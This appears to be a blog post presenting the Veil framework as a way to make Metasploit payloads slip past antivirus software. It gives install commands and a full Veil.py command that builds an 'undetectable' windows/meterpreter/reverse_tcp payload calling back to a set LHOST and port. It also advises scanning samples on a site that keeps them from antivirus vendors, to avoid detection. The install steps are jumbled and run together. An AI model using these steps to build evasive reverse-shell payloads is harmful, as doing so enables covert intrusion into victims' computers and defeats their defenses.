Veil
is an awesome tool developed by Chris Truncer @ChrisTruncer, Mike
Wright @TheMightyShiv and The Grayhound @the_grayhound specifically
designed for Kali Linux with the goal of:
- Bypass common AV solutions used.
- Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
- Try to create each payload as random as possible.
I want to talk about Veil and give some examples about how to bypass several anti-virus.
The main changes in the latest versions are:
- x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
- Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.
wget https://github.com/ChrisTruncer/Veil/archive/master.zipIf you want to work with Kali Linux, with the commands below it will be enough.
unzip master.zip
cd Veil-master/setup
cd ..
./setup.sh
apt-get updateI had a bad experience with the second option and I prefer to install Veil with the first one using “setup.sh” script.
apt-get install veil
The Veil’s developers don’t want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There is an alternative: vscan.novirusthanks.org. That site scans the suspicious files for malware detection and offers us the option: “Do not distribute the sample”.
When Veil has been installed, just run it with the command below:
./VeilBy default in Kali Linux, we can see 18 payloads ready to be used. Now we can type “use”.
- Enter metasploit payload: “windows/meterpreter/reverse_tcp“
- Enter value for ‘LHOST’, [tab] for local IP: “192.168.69.69″
- Enter value for ‘LPORT’: “443“
./Veil.py -l python -p b64VirtualAlloc -o undetectable –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.69.69 LPORT=443
Post a Comment